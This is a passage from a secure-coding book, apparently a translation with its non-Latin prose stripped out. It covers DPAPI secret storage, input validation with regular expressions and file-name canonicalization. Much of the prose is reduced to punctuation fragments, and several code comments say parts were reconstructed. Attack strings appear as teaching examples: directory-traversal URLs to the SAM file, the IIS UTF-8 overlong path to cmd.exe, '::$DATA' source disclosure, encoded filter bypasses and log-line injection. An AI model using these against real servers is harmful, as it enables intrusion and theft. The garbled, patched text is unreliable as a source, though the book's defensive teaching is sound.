                        NativeMethods.NullPtr,
                        NativeMethods.NullPtr,
                        ref ps,
                        dwFlags,
                        ref dout);
                if (ret) {
                    clearText = new byte[ dout.cbData ] ;
                    Marshal.Copy(dout.pbData,
                                 clearText, 0, dout.cbData);
                    NativeMethods.LocalFree(dout.pbData);
                } else {
#if (DEBUG)
                    Console.WriteLine("Decryption failed: " +
                        Marshal.GetLastWin32Error().ToString());
#endif
                }
            }
            finally {
                if ( din.pbData != IntPtr.Zero )
                    Marshal.FreeHGlobal(din.pbData);
            }
            return clearText;
        }

        static internal void InitPromptstruct(
            ref NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps) {
            ps.cbSize = Marshal.SizeOf(
                typeof(NativeMethods.CRYPTPROTECT_PROMPTSTRUCT));
            ps.dwPromptFlags = 0;
            ps.hwndApp = NativeMethods.NullPtr;
            ps.szPrompt = null;
        }
    }

    // The P/Invoke declarations used above are not shown on the page;
    // they are supplied here so the sample is complete.
    internal class NativeMethods {
        internal const int UIForbidden = 0x1;       // CRYPTPROTECT_UI_FORBIDDEN
        internal const int LocalMachine = 0x4;      // CRYPTPROTECT_LOCAL_MACHINE
        internal const int VerifyProtection = 0x40; // CRYPTPROTECT_VERIFY_PROTECTION
        internal static readonly IntPtr NullPtr = IntPtr.Zero;

        [StructLayout(LayoutKind.Sequential)]
        internal struct DATA_BLOB {
            public int cbData;
            public IntPtr pbData;
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        internal struct CRYPTPROTECT_PROMPTSTRUCT {
            public int cbSize;
            public int dwPromptFlags;
            public IntPtr hwndApp;
            public string szPrompt;
        }

        [DllImport("crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
        internal static extern bool CryptProtectData(
            ref DATA_BLOB pDataIn, string szDataDescr,
            IntPtr pOptionalEntropy, IntPtr pvReserved,
            ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
            int dwFlags, ref DATA_BLOB pDataOut);

        [DllImport("crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
        internal static extern bool CryptUnprotectData(
            ref DATA_BLOB pDataIn, string szDataDescr,
            IntPtr pOptionalEntropy, IntPtr pvReserved,
            ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
            int dwFlags, ref DATA_BLOB pDataOut);

        [DllImport("kernel32.dll")]
        internal static extern IntPtr LocalFree(IntPtr hMem);
    }
}
C# , DataProtection:
using Microsoft.Samples.DPAPI;
using System;
using System.Text;

class TestStub {
    public static void Main(string[] args) {
        string data = "Sample secret text"; // constructed sample; the page's string was lost
        string name="MySecret";
        Console.WriteLine("Data: " + data);
        string s = DataProtection.ProtectData(data,
                                              name,
                                              NativeMethods.UIForbidden);
        if (null == s) {
            Console.WriteLine("Protection failed");
            return;
        }
        Console.WriteLine("Protected: " + s);
        s = DataProtection.UnprotectData(s);
        Console.WriteLine("Unprotected: " + s);
    }
}
COM+;
, COM+.
.
System.EnterpriseServices.
.
COM+ C#
. .
: +
SN.exe, c:\keys\DemoSrv.snk,
. (strong
named assemblies) 18.
using System;
using System.Reflection;
using System.Security.Principal;
using System.EnterpriseServices;

[assembly: ApplicationName("ConstructDemo")]
[assembly: ApplicationActivation(ActivationOption.Library)]
[assembly: ApplicationAccessControl]
[assembly: AssemblyKeyFile(@"c:\keys\DemoSrv.snk")]

namespace DemoSrv {
    [ComponentAccessControl]
    [SecurityRole("DemoRole", SetEveryoneAccess = true)]
    // Allow the construction string to be set from Component Services.
    [ConstructionEnabled(Default="Set new data.")]
    public class DemoComp : ServicedComponent {
        private string _construct;

        override protected void Construct(string s) {
            _construct = s;
        }

        public string GetConstructString() {
            return _construct;
        }
    }
}
Microsoft ASP.NET ,
:
Component
Services ( ) (. 92). Sys
tem.EnterpriseServices Web http://msdn.microsoft.com/
msdnmag/issues/01/10/complus/complus.asp.
. 92.
COM+
: ,
. :
.NET .
.
, . C#, ErasableData,
.
,
.
.
using System;
using System.IO;
using System.Text;
using System.Security.Cryptography;
using System.Runtime.InteropServices;

// The page shows ErasableData only from its Data property onward; the class
// header, constructor and Dispose are reconstructed here so the sample compiles.
class ErasableData : IDisposable {
    private byte[] _rbSecret;
    private GCHandle _ph;

    public ErasableData(int size) {
        _rbSecret = new byte[size];
    }

    // Overwrite the secret and unpin the buffer.
    public void Dispose() {
        Array.Clear(_rbSecret, 0, _rbSecret.Length);
        if (_ph.IsAllocated)
            _ph.Free();
    }

    public byte[] Data {
        set {
            // Pin the buffer so the garbage collector cannot move or copy it.
            if (!_ph.IsAllocated)
                _ph = GCHandle.Alloc(_rbSecret, GCHandleType.Pinned);
            // Copy the secret into the pinned buffer.
            byte[] Data = value;
            Array.Copy (Data, _rbSecret, Data.Length);
        }
        get {
            return _rbSecret;
        }
    }
}

class DriverClass {
    // Stand-in for GetSecretFromUser, which the page does not show: a random
    // 16-byte key represents the secret obtained from the user.
    static byte[] GetSecretFromUser() {
        byte[] secret = new byte[16];
        new RNGCryptoServiceProvider().GetBytes(secret);
        return secret;
    }

    static void Main(string[] args) {
        if (args.Length == 0) {
            // Nothing to encrypt.
            return;
        }
        // Convert the argument to bytes.
        byte [] plaintext =
            new UTF8Encoding().GetBytes(args[0]);

        // The key is erased when the using block ends.
        using (ErasableData key = new ErasableData(16)) {
            key.Data = GetSecretFromUser();
            Rijndael aes = Rijndael.Create();
            aes.Key = key.Data;

            MemoryStream cipherTextStream = new MemoryStream();
            CryptoStream cryptoStream = new CryptoStream(
                cipherTextStream,
                aes.CreateEncryptor(),
                CryptoStreamMode.Write);
            cryptoStream.Write(plaintext, 0, plaintext.Length);
            cryptoStream.FlushFinalBlock();
            cryptoStream.Close();

            // Get the ciphertext and the initialization vector (IV).
            byte [] ciphertext = cipherTextStream.ToArray();
            byte [] IV = aes.IV;

            // Clear the key material held by the crypto objects.
            aes.Clear();
            cryptoStream.Clear();
        }
    }
}
:
IDisposable. using C#
, , Dispose.
aes.Clear cryptoStream.Clear. Clear
.
Password,
C#.
, (
) ( )
. Secret.txt. ,
.
FAT-
(
XML)
Web.
: ,
.
XOR
,
XOR. ,
, ,
. ,
, Microsoft Word GIF.
,
XOR .
3DES
, ,
3DES (TripleDES).
: ,
.
3DES
,
, .
, .
, , , , ,
, .
3DES
,
, .
, . , ,
.
3DES ,
,
ACL
ACL (
),
, . ,
,
. , ,
, ( )
. , !
? .
3DES,
, ,
ACL
.
,
, . ,
. ,
, .
, .
,
. ,
,
nCipher (http://www.ncipher.com).
,
. :
;
, ;
.
, ,
.
, .
. :
! . 91
; .
9-1. ,
( ,
)
, :
!
COM+
LSA
DPAPI ( )
DPAPI ( )
. ,
.
,
,
, .
, .
.
10
!
,
? , .
?
, ,
. :
, .
. :
, .
. .
:
.
, ,
,
. , .
?
, ,
, ,
. ,
, ,
, ?
: ,
? ,
.
: ,
Web. ,
,
. , ,
,
, ,
,
/. ,
, ,
. ,
, .
.
.
!
, !
,
, .
, ,
, ,
Web, .
.
,
,
,
. !
:
,
.
,
,
. ,
. ,
, , .
. ?
? (cross
site scripting) 13.
,
:
? ?
. :
( !);
;
.
. ?
strcpy(cDest, szData);
strcpy
. 101.
,
szData cDest
, strcpy
, , ,
, . strcpy
, ,
, !
,
ACL , . ,
, .
, ,
. ,
:
, ,
.
:
,
. :
;
(chokepoint) .
, ,
, .
,
, , .
, ,
.
, .
, .
; ,
(). ,
, (Web,
, , ..),
, ,
.
! , DLL,
ActiveX ,
.
, .
, ,
.
, (. 102).
. 102.
,
,
.
.
Web ,
(crosssite scripting): ( HTML
) Web.
13. Web
,
. 2001 .
Web, .
Web : ,
( ), ,
. .
, ,
Web , !
.
.
,
: , .
3
,
. ,
. :
;
.
11:
,
.
.
.
. ,
.
, .
.
#include <string.h>
#include <stdlib.h>

// Declared elsewhere in the page's sample (bodies not shown).
bool UploadUserFile(const char *szFilename);
void NotifyUserUploadOK(const char *szFilename);

// The start of IsBadExtension is missing from the page; the function header,
// the guards and the deny list are reconstructed here (the four extensions
// listed are an assumption). The deny-list approach itself is kept as the
// page shows it, since the text goes on to explain why it is inadequate.
bool IsBadExtension(const char *szFilename) {
    bool fIsBad = false;
    if (szFilename) {
        size_t cFilename = strlen(szFilename);
        if (cFilename >= 4) {
            // Deny list: four-character extensions that must not be uploaded.
            const char *szBadExt[] = {".exe", ".com", ".bat", ".cmd"};
            // Lower-case copy so the comparison ignores case.
            char *szLCase = _strlwr(_strdup(szFilename));
            if (szLCase) {
                for (size_t i=0;
                     i < sizeof(szBadExt) / sizeof(szBadExt[0]);
                     i++)
                    if (szLCase[cFilename-1] == szBadExt[i][3] &&
                        szLCase[cFilename-2] == szBadExt[i][2] &&
                        szLCase[cFilename-3] == szBadExt[i][1] &&
                        szLCase[cFilename-4] == szBadExt[i][0])
                        fIsBad = true;
                free(szLCase);
            }
        }
    }
    return fIsBad;
}

bool CheckFileExtension(const char *szFilename) {
    if (!IsBadExtension(szFilename))
        if (UploadUserFile(szFilename)) {
            NotifyUserUploadOK(szFilename);
            return true;
        }
    return false;
}
? IsBadExtension
.
: , , .
, Perl (.pl)
, Windows Scripting Host (.wsh, .js .vbs),
.
, Microsoft Office
(.doc, .xls ..),
. .
.
Web,
. :
Perl
Perl :
(tainted), ,
.
(, ) Perl .
:
use strict;
my $filename = <STDIN>;
open (FILENAME, ">> " . $filename) or die $!;
print FILENAME "Hello!";
close FILENAME;
, ,
. \boot.ini.
(T) Perl ,
open:
use strict;
my $filename = <STDIN>;
$filename =~ /(\w{1,8}\.log)/;
open (FILENAME, ">> " . $1) or die $!;
print FILENAME "Hello!";
close FILENAME;
.
8 .log.
(
), $1,
open. Perl ,
(, /(.*)/ ),
.
, .
.
, . C#
, C++.
RegularExpressions .NET Framework.
using System.Text.RegularExpressions;
...
static bool IsOKExtension(string Filename) {
Regex r =
new Regex(@"txt|rtf|gif|jpg|bmp$",
RegexOptions.IgnoreCase);
return r.Match(Filename).Success;
}
Perl :
sub isOkExtension($) {
$_ = shift;
return /txt|rtf|gif|jpg|bmp$/i ? -1 : 0;
}
, ,
. txt|rtf|gif|jpg|bmp$.
. 101.
10-1.
xxx|yyy
xxx yyy
,
, true. ,
C# RegexOptions.IgnoreCase, Microsoft Windows
.
. 102
. ,
.
10-2.
.
, {0,}
.
, {1,}
.
, {0,1}
{n}
{n,}
{,m}
{n,m}
n, m
\n
(<>)
() .
.
, (xx)+ ,
, . ,
(?:xx),
aa|bb
aa bb
[abc]
: a, b c
[^abc]
[az]
.
a z
.
(\n \/),
(\d).
() (\1)
\b
\B
\d
. , [09]
\D
. , [^09]
: , ,
,
\p{<>} Unicode;
\s
; , [\f\n\r\t\v]
\S
, ; , [^\f\n\r\t\v]
\w
() ; , [azAZ09_]
\W
( ) ;
, [^azAZ09_]
\xnn \x{nn}
, , nn
\unnnn
\x{nnnn}
Unicode,
, nnnn. ,
( 14)
(. 103).
10-3.
[afAF09]+
<(.*)>.*<\/\1>
HTML. : (.*)
(\1). , (.*)
FORM, \1 FORM
\d{5}(\d{4})?
^\w{1,32}(?:\.\w{0,4})? $
, . 1 32
,
0 4 .
,
, ?:
: ^ $
.
( )
. ,
( ) .
, , ,
, , .
. ,
:
RegExp r = [a-z]{1,8}\.[a-z]{1,3};
if (r.Match(strFilename).Success) {
    // Accept strFilename: it matched the pattern.
} else {
    // Reject the name: it did not match.
}
, 18
, 13
( ). ?
? , c:\boot.ini?
, c:\boot.ini
boot.ini, . .
, :
^[a-z]{1,8}\.[a-z]{1,3}$
^ , $ .
: ( ) 1
8 , 13
, . , c:\boot.ini
, : \
.
Unicode
, 8
, ,
! Unicode?
, , ,
? ,
.
Unicode
Unicode Regular Expression Guidelines http://
www.unicode.org/reports/tr18.
Unicode .
Unicode
:
Unicode ( );
Unicode . Windows
UTF16 (little endian). ,
Windows ;
;
Unicode .
: ,
Unicode, , .
, Perl 5.8.0 Unicode.
.NET Framework Microsoft,
. ,
Unicode.
,
, . ,
:
;
( )
, . ,
? cafe?
,
\u30FB:
Z ( ):
Zs (, );
Zl ( U+2028, (U+00A6)
);
Zp ( U+2029);
O ():
Cc (, ,
, );
Cf ( , ,
);
Co ( , );
Cn ( );
Cs ( ).
Unicode
http://oss.software.ibm.com/developerworks/opensour
ce/icu/ubrowse.
. Web
,
. :
, Unicode
Unicode. Unicode http://www.unicode.org/
charts.
! :
.
, ,
!
*
,
.
,
.
V , : ,
.
.
, ,
, 1799 . . .
Perl C#,
.
, . (:
,
.)
Perl
Perl ,
.
Perl, :
var =~ /<>/;
, C#, C++, Microsoft Visual
Basic .NET, ASP.NET , .NET Framework
System.Text.RegularExpressions.
.
C#, Visual Basic .NET C++.
C#
// C#.
String s = "Meeting at 12:15pm."; // constructed sample text
Regex r = new Regex(@".*(\d{2}:\d{2}[ap]m)",RegexOptions.IgnoreCase);
if (r.Match(s).Success)
    Console.Write(r.Match(s).Result("$1"));
If r.Match(s).Success Then
Console.Write(r.Match(s).Result("$1"))
End If
C++
// C++.
#using <mscorlib.dll>
#include <tchar.h>
#using <system.dll>
using namespace System;
using namespace System::Text;
using namespace System::Text::RegularExpressions;
...
String *s = S"Meeting at 12:15pm."; // constructed sample text
Regex *r = new Regex(".*(\\d{2}:\\d{2}[ap]m)",RegexOptions::IgnoreCase);
if (r->Match(s)->Success)
    Console::WriteLine(r->Match(s)->Result(S"$1"));
ASP.NET ,
.
JavaScript 1.2
, Perl. 4, Netscape Navigator Microsoft
Internet Explorer .
var r = /.*(\d{2}:\d{2}[ap]m)/;
var s = "Meeting at 12:15pm."; // constructed sample text
if (s.match(r))
    alert(RegExp.$1);
VBScript 5
RegExp:
C++
! , C++
, ,
. STL (Standard
Template Library), STL Regex++ http://
www.boost.org ( http://www.ddj.com/documents/s=1486/ddj0110a/0110a.htm
.)
Microsoft Visual C++ Microsoft Visual Studio .NET
ATL , CAtlRegExp.
, Regex++ CAtlRegExp
;
, .
CAtlRegExp http://msdn.microsoft.com/library/enus/vclib/html/
vclrfcatlregexp.asp.
CAtlRegExp:
#include <AtlRX.h>
CAtlRegExp<> re;
re.Parse(".*{\\d\\d:\\d\\d[ap]m}",FALSE);
CAtlREMatchContext<> mc;
if (re.Match("Meeting at 12:15pm.", &mc)) { // constructed sample text
    const CAtlREMatchContext<>::RECHAR* szStart = 0;
    const CAtlREMatchContext<>::RECHAR* szEnd = 0;
    mc.GetMatch(0,&szStart, &szEnd);
    ptrdiff_t nLength = szEnd - szStart;
    printf("%.*s",nLength, szStart);
}
,
, , C++,
C# Visual Basic .NET. UserInput C++:
#include <windows.h>
#include <string>
using namespace std;

class UserInput {
public:
    UserInput(){};
    ~UserInput(){};
    bool Init(const char* str) {
        // Validate before storing the input.
        if(!Validate(str)){
            return false;
        } else {
            input = str;
            return true;
        }
    }
    const char* GetInput(){return input.c_str();}
    DWORD Length(){return input.length();}
private:
    bool Validate(const char* str);
    string input;
};
. ,
,
UserInput, , . ,
Validate. Init ,
.
, Canonicalize.
,
.
,
, :
. ,
. :
.
,
;
. ,
,
. :
, .
,
, .
,
, , , .
11
,
: ,
, , , .
? , .
(Gertrude Stein), . ?
, ?
ROSE* : roze, ro$e, r0se r%6fse? ,
. , , ,
. , %6f
ASCII o.
?
: , ,
, ,
,
( ) .
(canonicalization)
,
.
, ,
,
Web
. , .
Rose . . .
, , .
(Johann Pachelbel) (16531706). Random House Websters
College Dictionary (Random House, 2000) :
. ,
,
.
,
. , c:\dir\test.dat, test.dat
..\..\test.dat .
c:\dir\test.dat. , , ,
.
, , ,
. ,
, . ,
. ,
, .
Napster
.
2001 ., ,
, Napster,
(Recording Industry Association of America, RIAA),
. Napster
, .
, :
, ,
Napster.
Siouxsie and the Banshees: Candyman AndymanCay (
), 92 degrees 92 degree$,
Deepest Chill Deepest Chi11. ,
, , ,
.
.
Web http://news.cnet.com/news/
010052005042145.html.
Mac OS X Apache
Web Apache, Mac OS X
Apple,
Hierarchical File System Plus (HFS+). HFS+ ,
Apache.
,
, . ,
scripts :
<Location /scripts>
order deny,allow
deny from all
</Location>
, http://www.northwindtraders.com/scripts/index.html, . http://www.northwindtraders.com/SCRIPTS/index.html, Index.html
.
, HFS+,
, Apache, Mac OS X,
. , Apache SCRIPTS ,
scripts, . HFS+ SCRIPTS
scripts ,
index.html.
http://www.securityfocus.com/
archive/1/190036.
DOS
, MSDOS
Windows .
, , (aux)
(lpt1 prn). ,
Windows 95 Windows 98 . Windows
,
, .
http://www.microsoft.com/technet/security/bulletin/MS00017.asp.
/tmp
StarOffice Sun
,
UNIX Linux. (symbolic link, symlink)
, ; ,
. UNIX ,
(hard link). ,
symlink .
!
, !
Windows
Windows ,
.
,
, .
8.3
, , , FAT,
MSDOS, : 8
3 (, , ).
FAT32 NTFS , , NTFS
255 Unicode.
NTFS FAT32 8.3,
NTFS
,
: ,
. ,
.asp, IIS Asp.dll.
.asp::$DATA, IIS ,
NTFS, ASP.
, Streams.exe Sysinternals (http://www.sysinternals.com),
Crucial ADS Crucial Security (http://www.crucialsecurity.com)
Security Expressions Pedestal Software (http://www.pedestalsoftware.com).
,
, ,
. ,
(access control list, ACL)
ACL .
, (.) (\),
, .
Win32,
, ,
. ,
Web, 17. ,
, (see Secureco2\Chapter11\TrailingDot):
#include <windows.h>
#include <strsafe.h>

int main() {
    char b[20];
    StringCbCopy(b, sizeof(b), "Hello!");
    HANDLE h = CreateFile("c:\\somefile.txt",
                          GENERIC_WRITE,
                          0, NULL,
                          CREATE_ALWAYS,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL);
    if (h != INVALID_HANDLE_VALUE) {
        DWORD dwNum = 0;
        WriteFile(h, b, lstrlen(b), &dwNum, NULL);
        CloseHandle(h);
    }

    h = CreateFile("c:\\somefile.txt.", // Note the trailing dot.
                   GENERIC_READ,
                   0, NULL,
                   OPEN_EXISTING,
                   FILE_ATTRIBUTE_NORMAL,
                   NULL);
    if (h != INVALID_HANDLE_VALUE) {
        char rb[20];
        DWORD dwNum = 0;
        ReadFile(h, rb, sizeof rb, &dwNum, NULL);
        CloseHandle(h);
    }
    return 0;
}
?
CreateFile somefile.txt
, somefile.txt
. ,
! , somefile.txt. somefile.txt ,
.
\\?\
( ANSI)
MAX_PATH (260). Unicode
32 000 Unicode,
\\?\. .
260 .
\\?\c:\temp\myfile.txt , c:\temp\myfile.txt.
\\?\, .
(..)
, , Web FTP
, .
,
.
.
, c:\datafiles. ,
. , ..\boot.ini,
(
) , , . .\winnt\repair\sam,
(Security Account Manager, SAM)
.
( , Windows 2000
Active Directory, SAM.)
, L0phtCrack ( http://www.atstake.com), .
!
?
c:\dir\foo\files\secret
c:\dir\foo\myfile.txt:
c:\dir\foo\files\secret\..\..\myfile.txt;
c:\dir\foo\files\..\myfile.txt;
c:\dir\..\dir\foo\files\..\myfile.txt.
!
, , ?
? , PATH?
. ,
File.exe File.exe:
, PATH?
,
Windows, .
NTFS ,
. MyFile.txt myfile.txt .
:
POSIX (Portable Operating System Interface for UNIX).
,
, Apple Mac OS X Web Apache.
UNC
(Universal Naming Convention, UNC). UNC
Windows
. UNC
.
BlakeLaptop Files,
c:\My Documents\Files. Z:
, net use z: \\BlakeLaptop\Files. z:\my
file.txt c:\My Documents\Files\myfile.txt .
UNC ,
. , \\BlakeLaptop\Files\myfile.txt z:\myfile.txt. UNC
\\?\, \\?\UNC\BlakeLaptop\Files
\\BlakeLaptop\Files.
:
API ( CreateFile)
, (named pipe) (mailslot).
,
.
(fireandforget).
(
), , ,
, . : \\<_
>\pipe\<_>, :
\\<_>\mail
slot\<_>\.
:
Windows
. , COM1
, AUX , LPT2
..
: CON, PRN, AUX, CLOCK$, NUL, COM1 COM9,
LPT1 LPT9. ,
NUL.txt, .
: . ,
C:\Program Files\COM1 , d:\North
WindTraders\COM1.
, ,
, ,
, . ,
.
\documents\com1, .
, ! ,
, .
, ,
,
, .
Web.
, ,
Windows. , Linux
, , /dev/
mouse, /dev/console, /dev/tty0, /dev/zero .
, Mandrake
Linux 7.1 Netscape 4.73, , file:///
dev/mouse
. , file:///dev/zero
.
, Web <IMG
SRC=file:///dev/mouse>.
,
.
Web
, ,
URL . ,
, . , .
AOL
America Online (AOL) 5.0 ,
Web
. URL ,
Web ,
. : ,
. , ,
, Web ( )
URL.
(. http://www.slashdot.org/features/00/07/15/
0327239.shtml).
eEye
, SecureIIS,
Internet Information Services (IIS).
eEye (http://www.eeye.com) SecureIIS:
SecureIIS Web Microsoft Internet Information Services
. SecureIIS IIS
Web
.
SecureIIS .
. ,
, ( )
, URL
action=delete. SecureIIS,
. , action=de
lete action=%64elete . %64
d.
Web
. , ,
URL, : http://www.northwindtraders.com/scripts/process.asp?fi
le=../../../winnt/repair/sam (
SAM). (..) (/), SecureIIS
. SecureIIS ,
: http://www.northwindtraders.com/scripts/process.asp?file=%2e%2e/%2e%2e/%2e
%2e/winnt/repair/sam. , , , %2e
!
Web http://www.security focus.com/
bid/2742.
, ::$DATA
Internet Information Server 4.0
, IIS,
. . NTFS,
Windows NT ,
, Apple Macintosh HFS,
, (fork), :
(data fork) (resource fork). (
Web http://support.microsoft.com/default.aspx?scid=kb;enus;Q147438.).
NTFS ,
. , ( Secureco2\Chapter11\NTFSStream) test Bar.txt (
bar.txt:test):
.
, NTFS
$DATA. ,
NTFS, :
boot.ini::$DATA
. 111.
NTFS
NTFS , NTFS,
. , , 16 now john3 readme
john3:16 readme:now.
.
.
IIS . ,
.asp, ASP (Active Server Pages),
Asp.dll. IIS ,
Windows, ,
.
, default
switch. , Data.txt,
, .txt,
.
, Default.asp::$DATA.
, IIS .asp::$DATA
. NTFS, ,
,
Default.asp. http://
www.microsoft.com/technet/security/bulletin/MS98003.asp.
/ .
, file.txt.
IP , ,
:
172.23.11.19    Mike    2002-09-03    13:02:43    file.txt
file.txt\r\n127.0.0.1\tCheryl\t2002-09-03\t13:03:00\tsecretfile.txt, :
172.23.11.19    Mike    2002-09-03    13:02:43    file.txt
127.0.0.1       Cheryl  2002-09-03    13:03:00    secretfile.txt
, Cheryl , (127.0.0.1)
? , .
,
!
http://online.securityfocus.com/
archive/82/271498/20020509/20020515/2.
Web
Web
. , URL Web
:
7 8 ASCII;
;
UTF8 ;
Unicode UCS2;
;
HTML ( Web, URL).
7- 8- ASCII-
, .
, .
,
, .
, %20, ( )
%A3. URL, http:/
/www.northwindtraders.com/my%20document.doc http://www.northwindtraders.com/
my%20document%2Edoc my document.doc,
Northwind Traders.
SecureIIS eEye. ,
.
, SecureIIS ,
.
UTF-8
RFC 2279 (http://www.ietf.org/rfc/rfc2279.txt) Unicode
8 (Eightbit Unicode Transformation Format, UTF8).
UTF8
, , 2 (UCS2) 4 (UCS4) Unicode
ASCII. ,
, .
UTF-8
UTF8 n ,
. , 7
ASCII (0x00 0x7F) 01100001, 0
, 0, 1100001 7 ,
ASCII. , H,
0x48 1001000 , UTF8 01001000
0x48. , 7 ASCII UTF8 .
, , 7
ASCII, Unicode, 0x7FFFFFFF.
, 0x80 0x7FF 110xxxxx 10xxxxxx,
110 10 , x
. , 0xA3
10100011 . UTF8
11000010 10100011 : 0xC2 0xA3.
. UTF8
(. 111).
Table 11-1. UTF-8 encoding of character ranges (patterns for the
3- to 6-byte rows restored from RFC 2279)

Character range               UTF-8 bit pattern
0x00000000 - 0x0000007F       0xxxxxxx
0x00000080 - 0x000007FF       110xxxxx 10xxxxxx
0x00000800 - 0x0000FFFF       1110xxxx 10xxxxxx 10xxxxxx
0x00010000 - 0x001FFFFF       11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
0x00200000 - 0x03FFFFFF       111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
0x04000000 - 0x7FFFFFFF       1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
:
, UTF8
. UTF8
. ,
(?) 0x3F 00111111
. ,
, :
0xC0 0xBF
0xE0 0x80 0xBF
0xF0 0x80 0x80 0xBF
0xF8 0x80 0x80 0x80 0xBF
0xFC 0x80 0x80 0x80 0x80 0xBF
UTF8 ,
, 0x3F.
, , UTF8,
IIS 4 IIS 5 .
%c0%af URL
, : http://servername/scripts/..%c0%af../winnt/system32/cmd.exe. , %c0%af? 11000000
10101111, UTF8, . 81,
11000000 10101111. , 00000101111
0x2F, , (/)! UTF8
(overlong sequence).
, URL, http://<_>/scripts/../../winnt/system32/cmd.exe. ,
scripts, ,
, system32,
Cmd.exe.
Web http://www.microsoft.com/technet/security/bulletin/MS00057.asp.
Unicode UCS-2
UCS2
UTF8. UCS2 (Universal Character
Set) , ASCII
, %uNNNN, NNNN
Unicode. , %5C UTF8 ASCII (\),
%u005C , 2 Unicode.
, , %u005C
Unicode, (fullwidth)
. Unicode
.
%uFF00 %uFFEF
%20 %7E. , \
%u005C %uFF3C.
,
, ,
, .
, UTF8 (%5c) : %,
5 c, , UTF8: %25, %35
%63. . 112
(\).
,
,
. ,
, .
Table 11-2. Ways of encoding the backslash (\)

%5c          plain (URL-encoded) UTF-8 backslash
%255c        %25 is %, followed by 5 and c
%%35%63      %, followed by %35 (5) and %63 (c)
%25%35%63    %, 5 and c, each URL-encoded as UTF-8
HTML
HTML ,
. , (< >) < >
£. !
,
. , < , C; (
<) < ( <).
http://
www.w3.org/TR/REChtml40/sgml/entities.html.
, Web , ,
,
.
.
2002 (Alex
Gontmakher), The Homograph
Attack ( ) (http://www.cs.technion.ac.il/~gabr/pubs.html).
,
, (. 112).
. 112. localhost, ? .
localhost ,
ASCII o
, localhost
o, (U+043E),
, . ,
,
. , ,
: a, c, e, p, y, x, H, T M.
/ (U+2044) / (U+002F). ,
. Unicode ,
14.
(0)
O.
, , URL
,
. , ,
localhost, 1ocalhost?
, ,
, .
: ,
.
.
, ,
.
(ACL)
. , , !
. , IIS ,
, ASP VBScript
Microsoft JScript, ,
. , , .
IIS, , , .
IIS, ::$DATA,
, IIS .
, IP
.
, ,
IP, DNS ,
.
! , ,
.
.
10, .
, , ,
. , ,
. :
:
C D;
;
, 32 ,
txt, jpg gif.
.
.
, , .
(
10):
^[cd]:(?:\\\w+)+\\\w{1,32}\.(txt|jpg|gif)$
:
c:\mydir\myotherdir\myfile.txt;
d:\mydir\myotherdir\someotherdir\picture.jpg.
:
e:\mydir\myotherdir\myfile.txt ( );
c:\fred.txt ( );
c:\mydir\myotherdir\..\mydir\myfile.txt ( ,
AZaz09 );
c:\mydir\myotherdir\fdisk.exe ( );
c:\mydir\myothe~1\myfile.txt ( );
c:\mydir\myfile.txt::$DATA ( ,
$ );
c:\mydir\myfile.txt. ( );
\\myserver\myshare\myfile.txt ( );
\\?\c:\mydir\myfile.txt ( ).
,
. :
, , .
! ,
.
.
:
, .
. .
: , ,
.
8.3
.
, .
8.3,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
:
NtfsDisable8dot3NameCreation : REG_DWORD : 1
: .
PATH
PATH .
, . ,
PATH,
c:\myhacktools, %systemroot% !
PATH ? :
,
.
Windows XP
:
, PATH.
,
. : HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode.
: DWORD, 0.
1 system32.
,
.
, .
, ,
Win32.
,
, .
,
,
. , CleanCanon ,
.
1. , mysecretfile.txt.
2. . , mysecretfile.txt ,
mysecr~1.txt, mysecretfile.txt::$DATA mysecretfile.txt. ( )
.
3. ,
MAX_PATH, .
DoS .
4. (
) c:\myfiles , c:\myfiles\mysecretfile.txt. \\?\ ,
,
.
5. GetFullPathName
(..).
6. GetLongPathName ,
. , mysecr~1.txt mysecretfile.txt. ,
2. !
7. , .
. GetFileType ,
FILE_TYPE_DISK, ,
.
, Linux
UNIX. , ,
C C++ stat
stat.st_mode S_IFREG (0x0100000),
, .
CleanCanon, Visual C++ .NET
Win32:
/*
  CleanCanon.cpp
*/
#include "stdafx.h"
#include "atlrx.h"
#include "strsafe.h"
#include <new>

enum errCanon {
    ERR_CANON_NO_ERROR = 0,
    ERR_CANON_INVALID_FILENAME,
    ERR_CANON_INVALID_PATH,
    ERR_CANON_NOT_A_FILE,
    ERR_CANON_NO_FILE,
    ERR_CANON_NO_PATH,
    ERR_CANON_TOO_BIG,
    ERR_CANON_NO_MEM};

errCanon GetCanonicalFileName(LPCTSTR szFilename,
                              LPCTSTR szDir,
                              LPTSTR *pszNewFilename) {
    // The directory must be supplied and must
    // not be longer than MAX_PATH.
    if (szDir == NULL)
        return ERR_CANON_NO_PATH;

    size_t cchDirLen = 0;
    if (StringCchLength(szDir,MAX_PATH,&cchDirLen) != S_OK ||
        cchDirLen > MAX_PATH)
        return ERR_CANON_TOO_BIG;

    *pszNewFilename = NULL;
    LPTSTR szTempFullDir = NULL;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    errCanon err = ERR_CANON_NO_ERROR;

    try {
        // Step 2
        // Check the file name (alphanumeric name, a dot and
        // a 1-4 character alphanumeric extension) and the
        // directory (drive letter, colon, '\', then lowercase
        // letters, digits and '\'). In ATL regular expressions
        // \a matches an alphanumeric and \c an alphabetic character.
        CAtlRegExp<> reFilename, reDirname;
        CAtlREMatchContext<> mc;
        reFilename.Parse(_T("^\\a+\\.\\a\\a?\\a?\\a?$"),FALSE);
        if (!reFilename.Match(szFilename,&mc))
            throw ERR_CANON_INVALID_FILENAME;
        reDirname.Parse(_T("^\\c:\\\\[a-z0-9\\\\]+$"),FALSE);
        if (!reDirname.Match(szDir,&mc))
            throw ERR_CANON_INVALID_PATH;

        size_t cFilename = lstrlen(szFilename);
        size_t cDir = lstrlen(szDir);

        // Length of the combined name, including
        // the separating backslash (\).
        size_t cNewFilename = cFilename + cDir + 1;

        // Step 3
        // Reject names longer than MAX_PATH.
        if (cNewFilename > MAX_PATH)
